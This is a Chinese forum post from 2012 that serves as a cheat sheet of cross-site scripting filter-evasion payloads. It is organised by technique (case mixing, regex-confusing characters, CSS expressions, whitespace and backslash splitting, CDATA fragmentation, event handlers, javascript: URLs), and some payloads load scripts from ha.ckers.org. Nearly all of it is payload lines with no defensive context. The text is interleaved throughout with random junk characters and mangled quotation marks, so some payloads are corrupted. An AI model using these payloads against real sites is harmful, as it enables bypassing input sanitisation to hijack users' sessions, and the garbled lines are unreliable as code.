1. 改变字符大小写
6 t0 D- U" l* S# F& `: J$ K. ?. L4 P! u. _# N
4 i/ [' Y/ r1 [ D$ v: k- O+ x" _
$ A9 V5 g" [* P2 C2 c% J
<sCript>alert(‘d’)</scRipT>4 A. [0 v, J: X
# |5 \. S y8 w4 F/ Z I4 i
2. 利用多加一些其它字符来规避Regular Expression的检查3 ~" F' Y$ J7 v
) u6 w9 X5 H) W" o) I3 |- C! L: ]
<<script>alert(‘c’)//<</script>
, l. E! T% g5 d2 B+ ~! A, ~- E; b# I. m8 y/ ^! d) `1 b% G5 v
<SCRIPT a=">" SRC="t.js"></SCRIPT>) b" w6 [" s- ]+ }5 R" d2 _: i; J
& O9 d9 u% e4 i. Y B <SCRIPT =">" SRC="t.js"></SCRIPT>
' z4 _2 p( O. W2 N' `
4 B, }- T9 _# l; K- B <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
& l7 S# t! b/ |: B. k( S& M7 H O9 X; ]1 I T, q1 Q
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
! a5 X6 G. v6 T$ S7 m# u" q* ~. l" `) Y
/ N. @5 }+ ]( z+ A$ o& E <SCRIPT a=`>` SRC="t.js"></SCRIPT>3 m2 V$ J' |1 H, W/ T
# d- a. u1 Z3 c <SCRIPT a=">’>" SRC="t.js"></SCRIPT>0 F9 v/ Z2 w7 c
0 x* s8 D/ }5 m6 Q" M3. 以其它扩展名取代.js
! C* W4 L# B. r! e1 T& M5 J6 n0 M& m5 ?$ N
<script src="bad.jpg"></script>
6 C4 S! L9 M5 d3 m) t# [: n
( r5 @6 d2 q3 ?3 Y1 s4. 将Javascript写在CSS档里5 [, r9 P3 {9 O. N7 ?
& m& B1 |% t5 F7 D' p- {1 k
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
7 p: E( I# X0 i
2 H3 W% p% F5 i0 w) g/ Y- } example:
6 f- h/ `( X, d! L
+ T& X( V* c0 _2 [ body {2 v- s. s" H9 s' D! }
' F0 x) F9 U+ K4 V; e background-image: url(‘javascript:alert("XSS");’)
, q9 w- t9 P! T9 h+ ^) C0 V; |! ?$ O; ~, g: A# G" J8 T9 F! [; u
}
" H3 k3 [" G' K, V" M- c7 V- k. \4 t2 q5 k' j
5. 在script的tag里加入一些其它字符
* O$ _* Y4 h3 V+ r
8 h" g& G* _; b5 t <SCRIPT/SRC="t.js"></SCRIPT>! @* {2 X1 d& |% p* A5 L. a
q+ _; U0 B2 e. |4 ?) Y1 p <SCRIPT/anyword SRC="t.js"></SCRIPT>
7 M8 g3 |+ Q7 U. X; V3 Z2 U# q
. M8 T$ S4 K9 B- B& P$ m) G. R6. 使用tab或是new line来规避
6 Z% N3 w& K7 i- {$ o) M% I2 J! M0 m
& ~+ {# ^: W4 {+ Q4 ]. f <img src="jav ascr ipt:alert(‘XSS3′)">3 M9 s5 q5 O0 d) W
m4 z: _: N/ ?6 q! c0 Y
<img src="jav ascr ipt:alert(‘XSS3′)">1 s$ Z3 B; X1 o! Q1 B$ A
& e6 k; h3 Y% M
<IMG SRC="jav ascript:alert(‘XSS’);">+ R6 X3 W/ D; J' t* H. t4 j: B' |- @
- V7 {2 ~3 i' Y& j* }* ^* | -> tag
" V# A& H: P8 P1 k- P* u+ G# A5 Y$ I$ `/ w7 X
-> new line
' f; [) S. y# { u$ E p* d$ P- D+ [5 S/ H! i6 r0 x& Q% o8 G
7. 使用"\"来规避! V) H9 T9 z r, L& e
8 j' k( W+ B& H9 H+ `% D, R <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
0 p* m5 P* i% I+ Q' S" p) S4 n& [0 ]# Q+ z$ l$ k
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
! U" w1 z# s* M9 W) T: n, `/ G
0 \0 O' x- t$ K. A. ]5 u <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
) |4 X+ {) f0 s0 Y+ \" r
8 u# E, F6 _, f% Y. Q# ~# ?2 w <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));"># l0 g5 O- d% H7 ]4 n
9 _* t) E' w' t% N! M
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
" b3 o1 l; _# I$ | ~' j0 E
% I% V3 X5 {0 _+ ]8. 使用Hex encode来规避(也可能会把";"拿掉)
6 _4 X! [& ]9 N! `# Z) }1 m$ A$ f3 B9 [
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
& U& @3 [) u K9 t& j' O A2 X A
3 d: g( |% @4 ~8 L+ X! a 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
( G1 {- E. C, |$ q, W; I Y5 w. u$ i$ r
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">; D1 B( ~' _$ n& [% L, M
% b7 a- X+ T6 x9 v! f( x 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">/ U6 ~8 [" e& [; {( E, B" n, _7 |
# d3 [: p0 t1 z: @$ W; c& H9 |1 b9. script in HTML tag3 F5 J2 E6 N% Z& v8 Z L7 G; k
9 |9 f; e; a- a( P: Y- _# [ T <body onload=」alert(‘onload’)」>
* s# x. I/ S3 |& {' @9 k0 E( O) m5 F: L ?- m) y# ?
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload' X/ O2 }! q/ r4 M4 J! {, S: V% K9 W
& g { p' R8 Z" F: E7 x" ~' L8 L
10. 在swf里含有xss的code5 F& N, C' E. P; Z1 f# K% x4 U
& t7 ^5 Q- U) v; L <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>3 {. n4 m) U. x0 e6 L2 t
6 ^1 ~0 D1 e# n% q& H( a6 [% p
11. 利用CDATA将xss的code拆开,再组合起来。5 \9 R6 Z |& S% z! e. S4 O9 M
3 o( l; K% M* A! b4 ?
<XML ID=I><X><C>
; t) A0 S$ p8 z0 Q0 j3 h
$ I' K, U1 T; U <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>' A# Z! ^/ s9 `2 b
0 p# |* W% Y9 \* r( h7 J. w
</C></X>
0 _& z8 v1 Z( Z9 u7 ]
9 O) g4 q% \: c5 w </xml>
5 W( q# Y( @$ M) s( |& k8 p" Q G" t+ D. `
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
$ f& q. _7 F0 ?5 f1 t$ g' V$ C0 S- R$ g
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>8 u M; X) R' u8 G" f! F/ C4 J# v
5 m3 {* t/ L2 r$ n5 A1 H! d$ Y
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
3 G6 r" V& N! R5 ]: H+ R8 |: o$ J, S8 s, \% B; S/ S
12. 利用HTML+TIME。7 e7 l3 g9 [! u$ B4 m. g) D t
% V( L) ]% x& g( }5 v
<HTML><BODY>
2 L1 H3 S- }( s& d; c- Z# o# f L. I1 ~: E: r
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
$ O; N+ |7 `+ Z; I& u* T
3 M1 S# E8 x2 n* M$ Z- A9 U& ?1 W ~1 e <?import namespace="t" implementation="#default#time2">
- l4 y8 R, r" ~2 f7 Q$ c3 t* Q2 e0 K; f$ ]* r& U9 K
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
3 {0 M& u; `& ]6 {2 |' e
$ _5 Z$ w1 y- }" S: T3 g$ N Q </BODY></HTML>; S. L! u _: n$ p# C& Q+ w4 Y
7 `; T. d1 {+ z5 F13. 透过META写入Cookie。; k* a% |/ h5 Q s
. c, ~. }) ]( Y" W) R, y <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">, ?+ l* W; k, R$ t+ j
5 c" H7 J" S; e% R4 n& c) F' M14. javascript in src , href , url+ M+ u9 u- T+ y y9 d7 k! }7 F
6 a$ p9 B, h9 U
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
" v0 V% v- E5 c5 Z! Q! C( V) x
6 @# B4 j) O9 L! ^ <img src="javascript:alert(‘XSS3′)">7 {: l# B- ~4 N6 T( P
& P* P2 g2 P0 h$ h<IMG DYNSRC="javascript:alert(‘XSS20′)">
' n9 G2 ?5 V* ^8 J6 O- l! _5 \" b' y7 Y# q" Z4 {' N/ l/ O
<IMG LOWSRC="javascript:alert(‘XSS21′)">
! h/ E9 I' }. R8 O2 a/ o
; p4 S0 O: X; A4 I0 n <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
6 k3 I; E. `" y/ v f5 D
8 h5 ~' R2 f. h2 |9 e3 W <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>5 f+ ?/ Y! A i! l7 |4 f. @
- ^8 Z" B1 a+ O5 }5 c' @ <TABLE BACKGROUND="javascript:alert(‘XSS29′)">) A! v7 B! @* n7 ]2 l( F
4 A: t. [+ |' ~, x7 y: }
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">* L# h$ ?# ?% l. N z' S5 X: \; V
* r% t6 \2 W X <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
- L, x" Z. E- j! o7 R
8 n* i( B! D/ k. j7 Z- i </STYLE><A CLASS=XSS></A>5 Z& P' r1 c% ?/ h% u
/ A1 V; p3 P; E
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>0 A3 ^" p+ H- M: g0 I
0 z3 S0 x- S; J* U! x; X
|
发表于 2012-12-31 09:59:28
收藏
支持
反对